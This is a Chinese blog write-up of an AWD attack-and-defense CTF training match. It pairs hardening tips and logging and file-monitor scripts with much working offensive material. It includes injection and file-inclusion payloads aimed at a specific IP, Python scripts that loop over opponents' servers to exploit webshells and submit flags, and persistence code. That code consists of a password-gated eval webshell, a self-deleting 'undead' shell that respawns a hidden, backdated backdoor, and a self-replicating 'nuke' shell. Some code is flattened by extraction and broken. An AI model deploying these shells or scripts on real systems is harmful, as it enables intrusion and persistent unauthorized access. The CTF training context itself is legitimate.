AWD之赛前赛后


AWD之赛前赛后

0xdawn

作为一名资深懒狗,距离上一次星盟四月AWD训练赛过去一个月,在五月训练前才开始整理AWD,请大佬轻锤。

训练赛使用的是实验室自研的H1ve平台,强行安利一下H1ve顺便吹一波彭锅

赛后总结我拿的是第一道题web_yunnan_simple来写的

上线后

上线一定要快,晚点上线人家马都给你安排上了

修改ssh密码
passwd username //回车输入新密码
备份源码
tar -zcvf /tmp/web.tar.gz /var/www/html/*	//tar打包

定期备份的话因人而异,我不是很喜欢用

crontab backupcrontab.txt

backupcrontab.txt中写入

0 1 * * * tar -zcvf /tmp/web.tar.gz /var/www/html/*

详见:Linux中使用crontab设置定时任务

预留后门查杀
  • D盾
  • WebShellKiller

config.php

@eval($_REQUEST['c']);payload:
http://106.52.236.34:10180/config.php?c=system(%27cat%20/flag%27);

footer.php

$shell=$_POST['shell'];
system($shell);payload:
POST
shell=cat /flag

admin/footer.php同上

admin/header.php

<?php $p=$_GET['p'];echo $p;$q=exec($p);var_dump($q);
?>payload:
http://106.52.236.34:10180/admin/header.php?p=cat%20/flag
修改Mysql密码
mysql -u root -p	//登陆后用以下命令
set password for root@localhost=password('新密码');	//MySQL 8 已移除 PASSWORD() 函数,在 8.x 上改用 alter user 'root'@'localhost' identified by '新密码';
备份数据库

账号密码一般在config.php,如果修改了密码记得修改config.php

备份:mysqldump -u root -p dbname>db.sql
还原:create database tmp;use tmp;source db.sql
修改admin默认密码
update admin set user_pass='新密码' where user_name='admin';

上回只补了login页面的sql注入,没注意到默认密码可以一直登录拿flag

添加脚本

流量监控

郁离歌大佬的waf

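<?php
// Request logger ("waf.php"): dumps every request (GET, POST, cookies,
// session, headers, uploads) to a per-client file under LOG_FILEDIR and
// neutralises uploaded files. Include it from a shared file such as
// config.php, or via auto_prepend_file in php.ini.
error_reporting(0);
define('LOG_FILEDIR', '/tmp/loooooooogs');
if (!is_dir(LOG_FILEDIR)) {
    // 0700: the logs contain raw POST bodies and cookies, so keep them
    // readable by the web-server user only (the original used the default mode).
    mkdir(LOG_FILEDIR, 0700, true);
}

if (!function_exists('getallheaders')) {
    /**
     * Polyfill for SAPIs without getallheaders(): rebuild the request headers
     * from the HTTP_* entries of $_SERVER ("HTTP_USER_AGENT" -> "User-Agent").
     *
     * @return array<string, string>
     */
    function getallheaders()
    {
        $headers = array(); // the original never initialised this, so a request with no headers returned null
        foreach ($_SERVER as $name => $value) {
            if (substr($name, 0, 5) === 'HTTP_') {
                $key = str_replace(' ', '-', ucwords(strtolower(str_replace('_', ' ', substr($name, 5)))));
                $headers[$key] = $value;
            }
        }
        return $headers;
    }
}

/**
 * Snapshot the current request and hand it to logging().
 *
 * Uploaded files are copied into the snapshot and their temporary file is
 * then overwritten with a fixed marker, so a later move_uploaded_file() in
 * the application cannot place the original content on disk.
 */
function waf()
{
    $files = $_FILES;
    foreach ($_FILES as $key => $value) {
        $files[$key]['content'] = file_get_contents($_FILES[$key]['tmp_name']);
        file_put_contents($_FILES[$key]['tmp_name'], "virink");
    }

    $header = getallheaders();
    unset($header['Accept']); // dropped from the log as in the original

    $input = array(
        "Get"     => $_GET,
        "Post"    => $_POST,
        "Cookie"  => $_COOKIE,
        "File"    => $files,
        "Session" => $_SESSION ?? array(), // no session started -> empty, instead of an undefined-variable notice
        "Header"  => $header,
    );
    logging($input);
}

/**
 * Append a print_r() dump of $var, the request URL and a separator line to
 * LOG_FILEDIR/<client ip>. The file name comes from REMOTE_ADDR, which the
 * server sets (not the client); missing $_SERVER keys fall back to
 * placeholders so the logger also works from the CLI.
 *
 * @param mixed $var data to dump
 */
function logging($var)
{
    $ip = $_SERVER['REMOTE_ADDR'] ?? 'unknown';
    $LOG_FILENAME = LOG_FILEDIR . "/" . $ip;
    $time = date("Y-m-d G:i:s");
    $url = 'http://' . ($_SERVER['HTTP_HOST'] ?? '') . ($_SERVER['PHP_SELF'] ?? '')
        . '?' . ($_SERVER['QUERY_STRING'] ?? '');
    // one append instead of three, under LOCK_EX so concurrent requests from
    // the same client do not interleave their entries
    file_put_contents(
        $LOG_FILENAME,
        "\r\n" . $time . "\r\n" . print_r($var, true)
            . "\r\n" . $url
            . "\r\n***************************************************************",
        FILE_APPEND | LOCK_EX
    );
}

waf();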

使用方法:

在所有php文件中加入 `require_once('waf.php');`

懒狗的话直接找个公用文件,如config.php,然后包含waf

或者修改php.ini文件

Automatically add files before or after any PHP document.
auto_prepend_file = /var/www/html/waf.php;

另外一个功能更强大的:

文件监控
<?php
/*
-------------------------------------------------
File Name:     fileMonitor
Description :
Author :       CoolCat
date:          2019/1/3
-------------------------------------------------
Change Activity:
2019/1/3:
-------------------------------------------------
*/
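/**
 * Polls a directory tree and reports files that appear, disappear or change
 * between two consecutive scans. Meant to run from the CLI
 * (`php fileMonitor.php --dir ./`) while a web root is being defended.
 */
class FileMonitor
{
    /** @var string directory being watched */
    private $dir;

    /**
     * @param array $argv       CLI arguments; `--dir <path>` selects the tree to watch
     * @param int   $intervalUs pause between two scans in microseconds (the
     *                          original busy-looped with no pause, pinning a core)
     */
    public function __construct($argv, $intervalUs = 1000000)
    {
        $this->dir = $this->getparam($argv);
        $previous = $this->scan($this->dir);
        print "[+] total:" . count($previous) . "\n\r";
        while (true) {
            usleep($intervalUs);
            clearstatcache(); // filesize()/filemtime() are cached per path within one process
            $current = $this->scan($this->dir);
            $this->report($previous, $current);
            // keep only the last snapshot: the original kept 30 in memory and
            // silently skipped one comparison every time it reset its ring
            $previous = $current;
        }
    }

    /**
     * Print the differences between two snapshots in the original's format.
     * Unlike the original, an add and a delete in the same interval (equal
     * file count) are both reported.
     *
     * @param array<string, array{0:int,1:int}> $previous
     * @param array<string, array{0:int,1:int}> $current
     */
    private function report(array $previous, array $current)
    {
        $diff = self::diff($previous, $current);
        if ($diff['added'] !== array()) {
            print "[+] total:" . count($current) . "\n\r";
            print "[*] addfile: " . implode('|', $diff['added']) . "\n\r";
        }
        if ($diff['deleted'] !== array()) {
            print "[+] total:" . count($current) . "\n\r";
            print "[*] deletefile: " . implode('|', $diff['deleted']) . "\n\r";
        }
        foreach ($diff['updated'] as $path) {
            print "[*] updatefile:{$path}\n\r";
        }
    }

    /**
     * Compare two snapshots by path. The original compared by position, so a
     * single added or removed file shifted every later entry and produced a
     * spurious "updatefile" line for each of them.
     *
     * @param array<string, array{0:int,1:int}> $previous
     * @param array<string, array{0:int,1:int}> $current
     * @return array{added: list<string>, deleted: list<string>, updated: list<string>}
     */
    public static function diff(array $previous, array $current)
    {
        $added = array_values(array_diff(array_keys($current), array_keys($previous)));
        $deleted = array_values(array_diff(array_keys($previous), array_keys($current)));
        $updated = array();
        foreach ($current as $path => $stat) {
            if (isset($previous[$path]) && $previous[$path] !== $stat) {
                $updated[] = $path;
            }
        }
        return array('added' => $added, 'deleted' => $deleted, 'updated' => $updated);
    }

    /**
     * Resolve `--dir <path>` from $argv, or exit with a message.
     *
     * @param array $argv
     * @return string
     */
    private function getparam($argv)
    {
        foreach ($argv as $key => $val) {
            if ($val === "--dir") {
                if (!isset($argv[$key + 1])) {
                    exit("[-] usage: php fileMonitor.php --dir <path>\n");
                }
                return is_dir($argv[$key + 1]) ? $argv[$key + 1] : exit("[-] directory does not exist!");
            }
        }
        // the original returned null here and then warned on filesize(null)
        exit("[-] usage: php fileMonitor.php --dir <path>\n");
    }

    /**
     * Walk $dir recursively and record size and mtime of every file.
     * Size alone (the original's check) misses same-size rewrites; mtime
     * alone can be reset with touch(), so both are recorded and compared.
     *
     * @param string $dir directory, or a single file
     * @return array<string, array{0:int,1:int}> path => [size, mtime]
     */
    public function scan($dir)
    {
        $snapshot = array();
        if (!is_dir($dir)) {
            $snapshot[$dir] = array(filesize($dir), filemtime($dir));
            return $snapshot;
        }
        $entries = scandir($dir);
        if ($entries === false) {
            return $snapshot; // unreadable directory: report nothing rather than warn
        }
        foreach ($entries as $entry) {
            if ($entry === '.' || $entry === '..') {
                continue;
            }
            $path = "{$dir}/{$entry}";
            if (is_dir($path)) {
                $snapshot += $this->scan($path);
            } else {
                $snapshot[$path] = array(filesize($path), filemtime($path));
            }
        }
        return $snapshot;
    }
}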
// Banner (the ASCII art was flattened onto one line by extraction), then
// start watching. The constructor polls forever, so nothing after this runs.
echo " _____________< FileMonitor >-------------/\_)o<|       | | O . O |\_____/By CoolCat
";
new FileMonitor($argv);
?>

用法

php fileMonitor.php --dir ./

代码审计

文件包含

about.php

$file=$_GET['file'];
include $file;payload:
http://106.52.236.34:10180/about.php?file=../../../flag

contact.php

$file_path = $_GET['path'];
if(file_exists($file_path)){$fp = fopen($file_path,"r");$str = fread($fp,filesize($file_path));echo $str = str_replace("\r\n","<br />",$str);
}payload:
http://106.52.236.34:10180/contact.php?path=../../../flag
sql注入

login.php

<?phpinclude_once('config.php');if (!empty($_POST['username'])) {$user=$_POST['username'];$pass=$_POST['password'];$query = "SELECT * FROM admin WHERE user_name='{$user}' and user_pass='{$pass}' ";$data = mysqli_query($dbc,$query);	if (mysqli_num_rows($data) == 1) {$row = mysqli_fetch_array($data);$_SESSION['username'] = $row['user_name'];header('Location: ./admin/index.php');}else{echo '<hr/><center><br/>用户名:',$user,'<br/>密码:',$pass,'<br/><br/>用户名密码错误</center>';}} 
?>payload:
username:admin' and 1=1#
password:随便填

search.php

<?phpinclude 'header.php';include_once('config.php');if (!empty($_GET['id'])) {$id=$_GET['id'];$query = "SELECT * FROM news WHERE id=$id";$data = mysqli_query($dbc,$query);	}$com = mysqli_fetch_array($data); 
?>payload:
http://106.52.236.34:10180/search.php?id=-1%20union%20select%201,group_concat(user_name,0x7e,user_pass),3%20from%20test.admin%23
敏感信息泄露

admin/index.php

这里也挺鸡贼的,打到一半才发现这里直接就把flag给泄露出去了,admin登录直接拿到

<h3>flag:<?php system("cat /flag")?></h3>

admin/upload/1532851316.php

<?php phpinfo();?>
文件上传
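// Upload handler for the "pic" form field. The original accepted any file
// type, stored it under a guessable name (time() + the user's extension) and
// printed the path, so a .php upload was immediately reachable. Now:
// extension whitelist, random file name, path no longer echoed.

/**
 * Lowercase extension of $name if it is in the image whitelist, else null.
 *
 * @param string $name client-supplied file name
 * @return string|null
 */
function allowed_upload_extension($name)
{
    $allowed = array('jpg', 'jpeg', 'png', 'gif');
    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    return in_array($ext, $allowed, true) ? $ext : null;
}

if (isset($_FILES['pic'])) {
    $error   = $_FILES['pic']['error'];
    $tmpName = $_FILES['pic']['tmp_name'];
    $name    = $_FILES['pic']['name'];
    $size    = $_FILES['pic']['size'];
    $type    = $_FILES['pic']['type'];
    try {
        // the original printed "上传成功" even when nothing was uploaded; all
        // three conditions are now required before anything is touched
        if ($name !== "" && $error === UPLOAD_ERR_OK && is_uploaded_file($tmpName)) {
            $ext = allowed_upload_extension($name);
            if ($ext === null) {
                exit("<script language='JavaScript'>alert('You should not do this!');window.location='index.php?page=submit'</script>");
            }
            $content = file_get_contents($tmpName); // the original fopen() handle was never closed
            if ($content === false) {
                die('No such file!');
            }
            if (strstr($content, 'fuck')) {
                exit("<script language='JavaScript'>alert('You should not do this!');window.location='index.php?page=submit'</script>");
            }
            // unpredictable name with a whitelisted extension; the client name
            // never reaches the filesystem
            $rootpath = './upload/' . bin2hex(random_bytes(8)) . '.' . $ext;
            if (!move_uploaded_file($tmpName, $rootpath)) {
                echo "<script language='JavaScript'>alert('文件移动失败!');window.location='index.php?page=submit'</script>";
                exit;
            }
            echo "上传成功"; // stored path deliberately not revealed (original echoed it)
        }
    } catch (Exception $e) {
        echo "ERROR";
    }
}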

文件上传的洞还不太会修,训练赛的时候尝试补了一下,但是页面直接挂了。所以我直接注释掉输出上传文件的位置,并且重命名时在时间戳后面再拼了一些东西,所以即使传了马也用不了。似乎也没被check的样子…

$rootpath='./upload/'.$time.'随便拼点东西进来'.$name1;

修补工作

open_basedir
  • 在php.ini中加入open_basedir="/var/www/html"
  • 在程序中加入ini_set('open_basedir', '/var/www/html');
  • 在apache的httpd.conf中的Directory配置php_admin_value open_basedir "/var/www/html"
  • 在httpd.conf的VirtualHost中加入php_admin_value open_basedir "/var/www/html"
  • nginx fastcgi.conf:fastcgi_param PHP_VALUE "open_basedir=/var/www/html"
addslashes
$id=addslashes($id);	//sql语句中记得给$id加上单引号;数字型参数直接用 intval($id) 更稳妥,addslashes 只是应急补丁,不能替代预处理语句

批量打全场

打预留马

手速要快,预留的估计打个一两轮就没了,发现了就赶紧跑脚本打

import requests
import time#GET
url = "http://106.52.236.34:1"
payload = "/config.php?c=system('cat /flag');"for i in range(1,30):if (i <10):flag_url = url + "0" + str(i) + "80" + payloadelse:flag_url = url + str(i) + "80" + payloadprint(flag_url)r = requests.get(flag_url)if "flag" in r.text:print(r.text)print("~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~")time.sleep(1)'''
#POST
url = "http://106.52.236.34:1"
payload = "/footer.php"
data = {'shell':'cat /flag'}for i in range(1,30):if (i <10):flag_url = url + "0" + str(i) + "80" + payloadelse:flag_url = url + str(i) + "80" + payloadprint(flag_url)r = requests.post(flag_url,data=data)if "flag" in r.text:print(r.text)print("~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~")time.sleep(1)
'''
提交flag
#coding:utf-8
import requests
import re
import timeurl = "http://ip:"
url1 = ""
shell = "/includes/config.php?d=system"
passwd = "c" 
port = "80"
payload = {passwd: 'cat /flag'}flag_server = "http://flag_server/flag_file.php?token=%s&flag=%s"
teamtoken = "team1"def submit_flag(target, teamtoken, flag):url = flag_server % (teamtoken, flag)pos = {}print "[+]Submitting flag:%s:%s" % (target, url)response = requests.post(url, data=pos)content = response.textprint "[+]content:%s" % contentif "success" in content:print "[+]Success!!"return Trueelse:print "[-]Failed"return Falsedef flag():f=open("webshelllist.txt","w") f1=open("firstround_flag.txt","w")for i in [8802,8803,8804]: url1=url+str(i)+shelltry:print "------------------------------------"res=requests.post(url1,payload,timeout=1)if res.status_code == requests.codes.ok:print url1 + " connect shell sucess,flag is "+res.text# 记录shell和获取的flagprint >>f1,url1+" connect shell sucess,flag is "+res.textprint >>f,url1+","+passwd# 正则捕获flagif re.match(r'hello world(\w+)', res.text):   flag = re.match(r'hello world(\w+)', res.text).group(1)submit_flag(url1, teamtoken, flag)else:print "[-]Can not get flag"else:print "shell 404"except:print url1 + "connect shell failed"f.close()f1.close()def timer(n):while True:flag()flag()flag()time.sleep(n)timer(300) # 一般为5分钟一轮

权限维持

软连接
ln -s /flag css/XXXXXXXX.css
<?php ignore_user_abort(true);set_time_limit(0);unlink(__FILE__);while (1){if(!file_exists('./css/8c2cbd7d93921dcd0859d0564a1df398.css')){system('ln -s /flag css/8c2cbd7d93921dcd0859d0564a1df398.css');}usleep(100);}
?>
一句话马
<?php if(md5($_POST["pass"])=="bc229eec746ba66ad1e326ff640e98fb"){@eval($_POST['hack']);} ?>
不死马
<?php ignore_user_abort(true);set_time_limit(0);unlink(__FILE__);while (1){if(!file_exists('./.header.php')){file_put_contents('./.header.php','<?php if(md5($_POST["pass"])==="bc229eec746ba66ad1e326ff640e98fb"){@eval($_POST["hack"]);} ?>');}system('chmod 777 .header.php');touch("./.header.php",mktime(20,15,1,4,28,2019));usleep(100);}
?>"system(base64_decode(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));"
核弹马
<?php set_time_limit(0);ignore_user_abort(true);unlink(__FILE__);while(1){file_put_contents(randstr().'.php',file_get_content(__FILE__));file_get_contents("http://127.0.0.1/");}?><?phpset_time_limit(0);ignore_user_abort(true);unlink(__FILE__);while(1){file_put_contents(randstr().'.php',file_get_content(__FILE__));file_get_contents("http://127.0.0.1/");}
?>
免杀一句话

待补充
